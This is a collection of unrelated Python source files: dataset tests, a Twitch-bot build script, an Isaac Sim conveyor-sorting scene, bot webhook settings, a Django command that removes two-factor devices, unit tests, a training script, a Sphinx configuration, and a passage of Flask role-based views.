planes_exist = [os.path.exists(dataset.outdir +'/' + x + '_planes.' +
dataset.arguments['image_file_format'])
for x in dataset.configurations]
# Begin test functions
def test_configuration_existence():
for conf in dataset.configurations:
assert conf in dataset.config_dict['GEOMETRY'].keys()
def test_configuration_fractions():
for conf in dataset.configurations:
frac = dataset.config_dict['GEOMETRY'][conf]['FRACTION']
simulated_images = int(frac * dataset.size)
if all(has_images):
assert getattr(dataset, f'{conf}_images').shape[0] == simulated_images
if all(has_metadata):
# not time-series
if 'TIMESERIES' not in dataset.config_dict['GEOMETRY'][conf].keys():
assert len(getattr(dataset, f'{conf}_metadata')) == simulated_images
# time-series
else:
nites = dataset.config_dict['GEOMETRY'][conf]['TIMESERIES']['NITES']
md_rows = len(nites) * simulated_images
assert md_rows == len(getattr(dataset, f'{conf}_metadata'))
def test_timeseries():
# already tested in test_configuration_fractions()
pass
def test_planes_and_objects():
for conf in dataset.configurations:
if all(has_metadata):
md = getattr(dataset, f'{conf}_metadata')
else:
# this test requires metadata
return
number_of_planes = 0
for plane in dataset.config_dict['GEOMETRY'][conf].keys():
if plane.startswith('PLANE_'):
number_of_planes += 1
number_of_objects = 0
for obj in dataset.config_dict['GEOMETRY'][conf][plane].keys():
if obj.startswith('OBJECT_'):
number_of_objects += 1
if all(has_metadata):
for band in dataset.bands:
num_md_cols = 0
for col in md.columns:
if (col.startswith(f'{plane}-{obj}') and
col.endswith(band)):
num_md_cols += 1
# Plane and obj info in metadata for band
assert num_md_cols > 0
# expected number of objects in plane
for band in dataset.bands:
md_objects = md[plane + '-NUMBER_OF_OBJECTS-' + band].values
assert all(md_objects == number_of_objects)
# expected number of planes in configuration
for band in dataset.bands:
md_planes = md['NUMBER_OF_PLANES-' + band].values
assert all(md_planes == number_of_planes)
|
import sys
from cx_Freeze import setup, Executable
base = None
# Uncomment to disable the console on Windows, once the thing is stable
#if sys.platform == "win32":
# base = "Win32GUI"
config = {
'description': 'Twitch Bot',
'author': 'Janne Enberg',
'url': 'https://github.com/lietu/twitch-bot',
'download_url': 'https://github.com/lietu/twitch-bot',
'author_email': 'janne.enberg@lietu.net',
'version': '0.1',
'install_requires': [
# str(r.req) for r in parse_requirements("requirements.txt")
],
'packages': [
'bot'
],
'scripts': [],
'name': 'bot'
}
packages = ['irc', 'jaraco', 'packaging', 'PySide']
namespace_packages = ['zc.lockfile', 'yg.lockfile']
include_files = ['db_migrations/', 'lua/', 'ui/']
excludes = ["settings"] # Let's not distribute the local settings.py file
includes = []
setup(
name=config["description"],
version=config["version"],
description=config["description"],
options={
"build_exe": {
"packages": packages,
"namespace_packages": namespace_packages,
"include_files": include_files,
"includes": includes,
"excludes": excludes
}
},
executables=[
Executable("twitchbot.py", base=base),
]
)
|
import os
import glob
from pathlib import Path
import numpy as np
import random
import carb
from PIL import Image
from tensorflow import keras
from pxr import Usd, UsdGeom, Gf, UsdPhysics
import omni.kit
from omni.isaac.examples.base_sample import BaseSample
from omni.isaac.core.objects import DynamicCuboid
from omni.isaac.core.utils.prims import create_prim, delete_prim
from omni.usd import get_context
from omni.kit.viewport import get_viewport_interface
from omni.isaac.core.prims.xform_prim import XFormPrim
from omni.isaac.core.materials import PreviewSurface
from omni.isaac.core.utils.rotations import euler_angles_to_quat
from omni.syntheticdata import sensors
import omni.syntheticdata._syntheticdata as sd
def setColliderSubtree(prim, approximationShape="none", execute_command_fn=None):
pit = iter(Usd.PrimRange(prim))
for p in pit:
if p.GetMetadata("hide_in_stage_window"):
pit.PruneChildren()
continue
if p.IsA(UsdGeom.Gprim) or p.IsInstanceable():
if p.GetAttribute("faceVertexIndices").Get():
omni.physx.scripts.utils.setCollider(p, approximationShape, execute_command_fn)
def setRigidBody(prim, approximationShape, kinematic, custom_execute_fn=None):
omni.physx.scripts.utils.setPhysics(prim, kinematic, custom_execute_fn)
if prim.IsA(UsdGeom.Xformable):
setColliderSubtree(prim, approximationShape, custom_execute_fn)
else:
omni.physx.scripts.utils.setCollider(prim, approximationShape, custom_execute_fn)
def create_light():
create_prim(
"/World/SphereLight",
"SphereLight",
position=np.array([0, 500, 500]),
attributes={
"radius": 150,
"intensity": 5e4
}
)
def create_classification_camera():
create_prim(
"/World/ClassificationCamera",
"Camera",
orientation=np.array([0.33, 0.197, 0.464, 0.794]),
position=np.array([151, 250, 135])
)
def find_usd_assets(shapenet_dir, categories, max_asset_size=50):
"""Look for USD files under root/category for each category specified.
For each category, generate a list of all USD files found and select
assets up to split * len(num_assets) if `train=True`, otherwise select the
remainder.
"""
from omni.isaac.shapenet.utils import LABEL_TO_SYNSET
references = {}
for category in categories:
category_id = LABEL_TO_SYNSET[category]
all_assets = glob.glob(
os.path.join(shapenet_dir, category_id, "*/*.usd"),
recursive=True)
if max_asset_size is None:
assets_filtered = all_assets
else:
assets_filtered = []
for a in all_assets:
if os.stat(a).st_size > max_asset_size * 1e6:
carb.log_warn(
f"{a} skipped as it exceeded the max \
size {max_asset_size} MB.")
else:
assets_filtered.append(a)
num_assets = len(assets_filtered)
if num_assets == 0:
raise ValueError(
f"No USDs found for category {category} \
under max size {max_asset_size} MB.")
references[category] = assets_filtered
return references
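# Hedged usage sketch (the path and categories are illustrative assumptions,
# not values taken from this scene): build the reference table once, then
# sample a random asset for a category when spawning a widget.
#
#   refs = find_usd_assets("/data/shapenet_nomat", ["car", "plane"], max_asset_size=50)
#   asset_usd = random.choice(refs["car"])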
def create_conveyor_anchor(plate_size):
size = 5
conveyor_anchor = create_prim(
"/World/Conveyor/Anchor",
"Cube",
position=np.array([0.0, -plate_size/2 - size, 0.0]),
scale=np.array([plate_size / 2, size, size]))
conveyor_anchor.GetAttribute("visibility").Set("invisible")
return conveyor_anchor
def create_conveyor_plate(stage, size, index):
plate_path = f"/World/Conveyor/Plates/Plate{index + 1}"
plate = DynamicCuboid(
prim_path=plate_path,
position=np.array([0, index * 100, 0.0]),
size=np.array([size - 5, size - 5, 10.0]),
color=np.array([0.28, 0.65, 1.0])
)
# prismatic joint
joint_path = f"/World/Conveyor/Joints/PrismaticJoint{index + 1}"
prismatic_joint = UsdPhysics.PrismaticJoint.Define(stage, joint_path)
prismatic_joint.CreateAxisAttr("Y")
prismatic_joint.CreateBody0Rel().SetTargets(["/World/Conveyor/Anchor"])
prismatic_joint.CreateBody1Rel().SetTargets([plate_path])
prismatic_joint.CreateLocalPos0Attr().Set(Gf.Vec3f(0.0, 1.0, 0.0))
prismatic_joint.CreateLocalPos1Attr().Set(Gf.Vec3f(0.0, -0.5, 0.0))
# add linear drive
driver = UsdPhysics.DriveAPI.Apply(
prismatic_joint.GetPrim(),
"linear")
driver.CreateTypeAttr("force")
driver.CreateMaxForceAttr(1000)
driver.CreateTargetVelocityAttr(200.0)
driver.CreateDampingAttr(1e10)
driver.CreateStiffnessAttr(0)
return plate
def create_pusher(stage, plate_size, index):
actuator_path = f"/World/Pushers/Actuators/Actuator{index + 1}"
anchor_path = f"/World/Pushers/Anchors/Anchor{index + 1}"
depth = 10
anchor = create_prim(
anchor_path,
"Cube",
position=np.array([
-plate_size/2 - depth - 5,
(index + 2) * plate_size * 2,
20.0]),
scale=np.array([5, 5, 5]))
anchor.GetAttribute("visibility").Set("invisible")
pusher = DynamicCuboid(
prim_path=actuator_path,
position=np.array([
-plate_size/2 - 5,
(index + 2) * plate_size * 2,
20.0]),
size=np.array([depth, plate_size * 2, 30]),
color=np.array([0.1, 0.1, 0.5])
)
mass_api = UsdPhysics.MassAPI.Apply(pusher.prim)
mass_api.CreateMassAttr(1)
# Prismatic joint
joint_path = f"/World/Pushers/Joints/Joint{index + 1}"
joint = UsdPhysics.PrismaticJoint.Define(stage, joint_path)
joint.CreateAxisAttr("X")
joint.CreateBody0Rel().SetTargets([anchor_path])
joint.CreateBody1Rel().SetTargets([actuator_path])
joint.CreateLocalPos0Attr().Set(Gf.Vec3f(1.0, 0.0, 0.0))
joint.CreateLocalPos1Attr().Set(Gf.Vec3f(-0.5, 0.0, 0.0))
# Linear drive. No position target is set, only activated when needed.
driver = UsdPhysics.DriveAPI.Apply(joint.GetPrim(), "linear")
driver.CreateTypeAttr("force")
driver.CreateMaxForceAttr(1000)
driver.CreateDampingAttr(2e4)
driver.CreateStiffnessAttr(1e5)
return driver
def create_bucket(stage, plate_size, index):
bucket_path = f"/World/Buckets/Bucket{index + 1}"
width = plate_size * 2
depth = width
height = 20
a = create_prim(
f"{bucket_path}/a",
"Cube",
position=np.array([
plate_size/2 + depth/2 - 10,
(index + 2) * 2 * plate_size - width / 2,
-height - 5
]),
scale=np.array([depth/2, 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
b = create_prim(
f"{bucket_path}/b",
"Cube",
position=np.array([
plate_size/2 + depth/2 - 10,
(index + 2) * 2 * plate_size + width / 2,
-height - 5
]),
scale=np.array([depth/2, 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
c = create_prim(
f"{bucket_path}/c",
"Cube",
position=np.array([
plate_size/2 + 5 - 10,
(index + 2) * 2 * plate_size,
-height - 5
]),
scale=np.array([5, width/2 - 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
d = create_prim(
f"{bucket_path}/d",
"Cube",
position=np.array([
plate_size/2 + depth - 5 - 10,
(index + 2) * 2 * plate_size,
-height - 5
]),
scale=np.array([5, width/2 - 5, height]),
attributes={
"primvars:displayColor": [(1.0, 1.0, 1.0)]
}
)
UsdPhysics.CollisionAPI.Apply(a)
UsdPhysics.CollisionAPI.Apply(b)
UsdPhysics.CollisionAPI.Apply(c)
UsdPhysics.CollisionAPI.Apply(d)
class Conveyor2(BaseSample):
def __init__(self) -> None:
super().__init__()
return
def setup_scene(self):
world = self.get_world()
self.model = keras.models.load_model("/home/bjnortier/isaac/sorting/save_at_30-augmented-3.h5")
self.categories = [
"bus", "car", "plane", "rocket", "watercraft"
]
shapenet_dir = Path(os.environ["SHAPENET_LOCAL_DIR"])
self.asset_references = find_usd_assets(
f"{shapenet_dir}_nomat",
self.categories)
self.num_classes = len(self.categories)
self.num_plates = self.num_classes * 2 + 4
plate_size = 100.0
self.max_plate_position = plate_size * self.num_plates
self.widget_index = 0
self.plate_reset_count = 0
stage = get_context().get_stage()
world.scene.add_ground_plane(z_position=-45.0)
create_light()
create_classification_camera()
create_conveyor_anchor(plate_size)
self.plates = []
for i in range(self.num_plates):
self.plates.append(create_conveyor_plate(stage, plate_size, i))
self.pushers = []
for i in range(self.num_classes):
self.pushers.append(create_pusher(stage, plate_size, i))
for i in range(self.num_classes):
create_bucket(stage, plate_size, i)
viewport_interface = get_viewport_interface()
viewport_handle = viewport_interface.create_instance()
vp = viewport_interface.get_viewport_window(viewport_handle)
vp.set_active_camera("/World/ClassificationCamera")
vp.set_texture_resolution(299, 299)
self.classification_viewport = vp
self.sd_interface = sd.acquire_syntheticdata_interface()
self.is_sensor_initialized = False
# Create the first widget
self.drop_widget(y_position=100.0)
return
def drop_widget(self, y_position=0.0):
category = random.choice(self.categories)
asset_reference = random.choice(self.asset_references[category])
widget_path = f"/World/widget_{self.widget_index}"
widget_prim = create_prim(
widget_path,
"Xform",
scale=np.array([50.0, 50.0, 50.0]),
orientation=euler_angles_to_quat(
np.array([90.0, 0.0, 0.0]),
degrees=True),
position=np.array([0.0, y_position, 50.0]),
usd_path=asset_reference,
semantic_label=category)
self.current_widget_category = category
widget = XFormPrim(widget_path)
material = PreviewSurface(
prim_path="/World/Looks/ShapeMaterial",
color=np.array([0.1, 0.6, 0.1]))
widget.apply_visual_material(material)
# Determine bounds and translate to sit on the Z=0 plane
orientation_on_plane = euler_angles_to_quat(
np.array([90.0, 0.0, 0.0]),
degrees=True)
widget.set_local_pose(
np.array([0.0, 0.0, 0.0]),
orientation_on_plane)
bounds = UsdGeom.Mesh(widget_prim).ComputeWorldBound(0.0, "default")
new_position = np.array([0.0, 0.0, -bounds.GetBox().GetMin()[2] + 5.0])
widget.set_local_pose(new_position)
mass_api = UsdPhysics.MassAPI.Apply(widget_prim)
mass_api.CreateMassAttr(1)
setRigidBody(widget_prim, "convexHull", False)
self.widget = widget
self.widget_index += 1
self.widget_class = None
self.classification_requested = False
self.classification_complete = False
self.arm_activated = False
for pusher in self.pushers:
pusher.CreateTargetPositionAttr(0.0)
async def setup_post_load(self):
self._world = self.get_world()
self._world.add_physics_callback("sim_step", callback_fn=self.sim_step_callback)
return
def sim_step_callback(self, step_size):
if not self.is_sensor_initialized:
print("Waiting for sensor to initialize")
sensor = sensors.create_or_retrieve_sensor(
self.classification_viewport, sd.SensorType.Rgb)
self.is_sensor_initialized = \
self.sd_interface.is_sensor_initialized(sensor)
if self.is_sensor_initialized:
print("Sensor initialized!")
for plate in self.plates:
# When a plate reaches the end of the conveyor belt,
# reset its position to the start. Drop a new widget
# once every plate has wrapped around
plate_position, _ = plate.get_world_pose()
if plate_position[1] > self.max_plate_position:
plate_position[1] -= self.max_plate_position
plate.set_world_pose(plate_position)
self.plate_reset_count += 1
if self.plate_reset_count == self.num_plates:
self.plate_reset_count = 0
self.drop_widget()
# Classify the widget when it passes under the camera
if not self.classification_requested:
widget_position, _ = self.widget.get_world_pose()
if widget_position[1] > 100:
self.capture_gt()
self.classification_requested = True
if self.classification_complete and not self.arm_activated:
widget_position, _ = self.widget.get_world_pose()
if widget_position[1] > (self.widget_class + 1) * 200 + 100:
self.arm_activated = True
self.pushers[self.widget_class].CreateTargetPositionAttr(120.0)
def capture_gt(self):
rgb = sensors.get_rgb(self.classification_viewport)
# Discard alpha channel
rgb = rgb[:, :, :3]
model_input = np.expand_dims(rgb, axis=0)
prediction = self.model.predict(model_input)
self.widget_class = np.argmax(prediction)
print(f"actual:predicted {self.current_widget_category}:{self.categories[self.widget_class]}")
image = Image.fromarray(rgb)
image.save("/tmp/rgb.png")
self.classification_complete = True
async def setup_pre_reset(self):
return
async def setup_post_reset(self):
return
def world_cleanup(self):
return
|
import os
# Bot token
BOT_TOKEN = os.getenv('BOT_TOKEN')
# Web application setup
WEBAPP_HOST = '0.0.0.0'
WEBAPP_PORT = int(os.getenv('PORT'))
# Webhook setup
WEBHOOK_HOST = 'https://neural-painter-bot.herokuapp.com'
WEBHOOK_PATH = f'/webhook/{BOT_TOKEN}'
WEBHOOK_URL = f'{WEBHOOK_HOST}{WEBHOOK_PATH}'
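# Hedged sketch (assumption: an aiogram 2.x style bot consumes these values;
# the original repository may wire them up differently). Typical usage would be:
#
#   from aiogram.utils.executor import start_webhook
#   start_webhook(dispatcher, webhook_path=WEBHOOK_PATH,
#                 host=WEBAPP_HOST, port=WEBAPP_PORT)
#
# with the webhook registered on startup via bot.set_webhook(WEBHOOK_URL).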
|
from django.core.management.base import BaseCommand, CommandError
try:
from django.contrib.auth import get_user_model
except ImportError:
from django.contrib.auth.models import User
else:
User = get_user_model()
from django_otp import devices_for_user
class Command(BaseCommand):
"""
Command for disabling two-factor authentication for certain users.
The command accepts any number of usernames, and will remove all OTP
devices for those users.
Example usage::
manage.py disable bouke steve
"""
args = '<username username ...>'
help = 'Disables two-factor authentication for the given users'
def handle(self, *args, **options):
for username in args:
try:
user = User.objects.get_by_natural_key(username)
except User.DoesNotExist:
raise CommandError('User "%s" does not exist' % username)
for device in devices_for_user(user):
device.delete()
|
import unittest
from app.models import Comments
class CommentsModelTest(unittest.TestCase):
def setUp(self):
self.new_comment = Comments(comment='a')
def test_instance(self):
self.assertEqual(self.new_comment.comment, 'a')
def test_save_comment(self):
self.new_comment.save_comment()
self.assertTrue(len(Comments.query.all()) > 0)
def test_get_comment_by_id(self):
self.new_comment.save_comment()
got_comment = Comments.get_comment(1)
self.assertTrue(len(got_comment) > 0)
if __name__ == '__main__':
unittest.main()
|
#!/bin/env dls-python
from sys import version_info
if version_info.major == 2:
import __builtin__ as builtins # Allows for Python 2/3 compatibility, 'builtins' is namespace for inbuilt functions
else:
import builtins
import unittest
from mock import patch, MagicMock
p = patch('dls_ade.Server')
server_mock = MagicMock()
m = p.start()
m.return_value = server_mock
from dls_ade import dls_list_modules
p.stop()
class ParserTest(unittest.TestCase):
def setUp(self):
self.parser = dls_list_modules.make_parser()
def test_parser_understands_domain(self):
args = self.parser.parse_args("-i TS".split())
self.assertEqual(args.area, "ioc")
self.assertEqual(args.domain_name, "TS")
class PrintModuleListTest(unittest.TestCase):
def setUp(self):
self.server_mock = server_mock
def tearDown(self):
self.server_mock.reset_mock()
def test_server_repo_list_called(self):
source = "test/source"
dls_list_modules.get_module_list(source)
self.server_mock.get_server_repo_list.assert_called_once_with(source)
def test_given_valid_source_then_list_of_modules(self):
self.server_mock.get_server_repo_list.return_value = [
"test/source/module", "test/source/module2.git"
]
source = "test/source"
module_list = dls_list_modules.get_module_list(source)
self.assertIsNotNone(module_list)
self.assertListEqual(module_list, ['module', 'module2'])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File : train.py
# Author: Alvin(Xinyao) Sun <xinyao1@ualberta.ca>
# Date : 02.05.2021
import logging
import os
import sys
import hydra
import pytorch_lightning as pl
from omegaconf import DictConfig, OmegaConf
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
log = logging.getLogger(__name__)
@hydra.main(config_path='config', config_name='train_config')
def main(cfg: DictConfig):
print(OmegaConf.to_yaml(cfg))
pl.seed_everything(cfg.seed)
# ------------
# data
# ------------
data_module = hydra.utils.instantiate(cfg.data)
# ------------
# model
# ------------
model = hydra.utils.instantiate(cfg.model)
# ------------
# training
# ------------
trainer = pl.Trainer(**(cfg.pl_trainer), checkpoint_callback=True)
log.info('run training...')
train_dataloader = data_module.train_dataloader()
val_dataloader = data_module.val_dataloader()
trainer.fit(model,
train_dataloaders=train_dataloader,
val_dataloaders=[val_dataloader])
if __name__ == '__main__':
try:
main()
except Exception as e:
log.error(e)
exit(1)
|
from .wasserstein import wasserstein_distance
from .bottleneck import bottleneck_distance
__author__ = "Marc Glisse"
__copyright__ = "Copyright (C) 2020 Inria"
__license__ = "MIT"
|
# -*- coding: utf-8 -*-
#
# Zend Framework 2 documentation build configuration file, created by
# sphinx-quickstart on Fri Jul 6 18:55:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Zend Framework 2'
copyright = u'2012, Zend Technologies Ltd.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0.0rc1'
# The full version, including alpha/beta/rc tags.
release = '2.0.0rc1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "../../zf2_logo.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ZendFramework2doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ZendFramework2.tex', u'Zend Framework 2 Documentation',
u'Zend Technologies Ltd.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'zendframework2', u'Zend Framework 2 Documentation',
[u'Zend Technologies Ltd.'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ZendFramework2', u'Zend Framework 2 Documentation',
u'Zend Technologies Ltd.', 'ZendFramework2', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Hack to render the php source code without the <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
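# Quick sanity check for the override above (a hedged sketch, kept commented so
# it never runs during a Sphinx build): it shows that snippets without a leading
# <?php tag are still tokenized as PHP thanks to startinline=True.
#
# from pygments import highlight
# from pygments.formatters import TerminalFormatter
# print(highlight("echo 'hello';", lexers['php'], TerminalFormatter()))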
|
# Copyright 2014 SolidBuilds.com. All rights reserved #
# Authors: Ling Thio <ling.thio@gmail.com>
from datetime import datetime
try:
    from urllib.parse import quote  # used for the login redirect in register()
except ImportError:  # Python 2 fallback
    from urllib import quote
from flask import current_app, flash
from flask import Blueprint, redirect, render_template
from flask import request, url_for
from flask_user import current_user, login_required, roles_accepted
from flask_user.views import _get_safe_next_param, render, _send_registered_email, _endpoint_url, _do_login_user
from flask_user import signals
from webapp import db
from webapp.models.user_models import User, Role, AdminRegisterForm, EmployerRegisterForm, EmployeeRegisterForm
from webapp.models.user_models import AdminProfileForm, EmployerProfileForm, EmployeeProfileForm, SuspendUserForm
from webapp.models.user_models import TrainingVideoForm
from MappingCommon import MappingCommon
# When using a Flask app factory we must use a blueprint to avoid needing 'app' for '@app.route'
main_blueprint = Blueprint('main', __name__, template_folder='templates')
@main_blueprint.route('/')
def base_page():
return redirect(url_for('main.home_page'))
# The Home page is accessible to anyone
@main_blueprint.route('/home')
def home_page():
return render_template('pages/home_page.html')
# ----------------------------------------------------------------
# The Administrator page is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin')
@roles_accepted('admin')
@login_required
def admin_page():
return render_template('pages/admin_page.html')
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/list_admins_employers')
@roles_accepted('admin')
@login_required
def list_admins_employers():
# Get all users that are admins or employers.
users = User.query.filter(User.roles.any((Role.name=='admin') | (Role.name=='employer'))).all()
admin_list = []
employer_list = []
for user in users:
if user.get_roles_string() == 'admin':
admin_list.append((user.last_name, user.first_name, user.email))
elif user.get_roles_string() == 'employer':
employer_list.append((user.company_name, user.last_name, user.first_name, user.email))
admin_list.sort()
employer_list.sort()
return render_template('pages/list_admins_employers_page.html', admin_list=admin_list, employer_list=employer_list)
# The Administrator submenu is accessible to authenticated users with the 'admin' role.
@main_blueprint.route('/employer/list_employees_by_admin')
@roles_accepted('admin')
@login_required
def list_employees_by_admin():
# Get all users that are employers.
employers = User.query.filter(User.roles.any(Role.name=='employer')).all()
employer_list = []
for employer in employers:
# Get all users invited by this employer.
users = User.query.filter(User.invited_by == employer.id).all()
employee_list = []
for user in users:
employee_list.append((user.last_name, user.first_name, user.email))
employee_list.sort()
employer_list.append((employer.company_name, employee_list))
employer_list.sort()
return render_template('pages/list_employees_by_admin_page.html', employer_list=employer_list)
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/admin_employer_invite')
@roles_accepted('admin')
@login_required
def admin_employer_invite():
return redirect(url_for('user.invite'))
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/suspend_admin_employer_employee', methods=['GET', 'POST'])
@roles_accepted('admin')
@login_required
def suspend_admin_employer_employee():
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
form = SuspendUserForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Validate the specified email address.
email = form.email.data
user = User.query.filter(User.email == email).first()
if not user:
flash("No such user", "error")
return redirect(url_for('main.suspend_admin_employer_employee'))
if int(form.activate_flag.data):
activate = True
verb = 'reactivated.'
else:
activate = False
verb = 'suspended.'
db_adapter.update_object(user, active=activate)
# Save modified user record
db_adapter.commit()
flash('User has been successfully ' + verb, 'success')
# Process GET or invalid POST
return render_template('pages/suspend_admin_employer_employee_page.html', form=form)
# ----------------------------------------------------------------
# The Employer page is accessible to authenticated users with the 'employer' or 'admin' role.
@main_blueprint.route('/employer')
@roles_accepted('employer', 'admin')
@login_required
def employer_page():
return render_template('pages/employer_page.html')
# The Employer submenu is accessible to authenticated users with the 'employer' role.
@main_blueprint.route('/employer/list_employees_by_employer')
@roles_accepted('employer')
@login_required
def list_employees_by_employer():
# Get all users invited by this employer.
users = User.query.filter(User.invited_by == current_user.id).all()
employee_list = []
for user in users:
employee_list.append((user.last_name, user.first_name, user.email))
employee_list.sort()
employer = User.query.filter(User.id == current_user.id).first()
return render_template('pages/list_employees_by_employer_page.html', company_name=employer.company_name, employee_list=employee_list)
# The Employer submenu is accessible to authenticated users with the 'employer' role
@main_blueprint.route('/employer/employee_invite')
@roles_accepted('employer')
@login_required
def employee_invite():
return redirect(url_for('user.invite'))
# The Employer submenu is accessible to authenticated users with the 'employer' role
@main_blueprint.route('/employer/suspend_employee', methods=['GET', 'POST'])
@roles_accepted('employer')
@login_required
def suspend_employee():
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
form = SuspendUserForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Validate the specified email address.
email = form.email.data
user = User.query.filter((User.email == email) & (User.invited_by == current_user.id)).first()
if not user:
flash("No such employee", "error")
return redirect(url_for('main.suspend_employee'))
if int(form.activate_flag.data):
activate = True
verb = 'reactivated.'
else:
activate = False
verb = 'suspended.'
db_adapter.update_object(user, active=activate)
# Save modified user record
db_adapter.commit()
flash('Employee has been successfully ' + verb, 'success')
# Process GET or invalid POST
return render_template('pages/suspend_employee_page.html', form=form)
# ----------------------------------------------------------------
# The Employee page is accessible to authenticated users with the 'employee' or 'admin' role.
@main_blueprint.route('/employee')
@roles_accepted('employee', 'admin')
@login_required # Limits access to authenticated users
def employee_page():
return render_template('pages/employee_page.html')
# The Employee submenu is accessible to authenticated users with the 'employee' role
@main_blueprint.route('/employee/training')
@roles_accepted('employee')
@login_required # Limits access to authenticated users
def training():
trainingForm = TrainingVideoForm(request.form)
mapc = MappingCommon()
# Read configuration parameters.
videoUrl = mapc.getConfiguration('VideoUrl')
introVideo = mapc.getConfiguration('QualTest_IntroVideo')
introWidth = mapc.getConfiguration('QualTest_IntroVideoWidth')
introHeight = mapc.getConfiguration('QualTest_IntroVideoHeight')
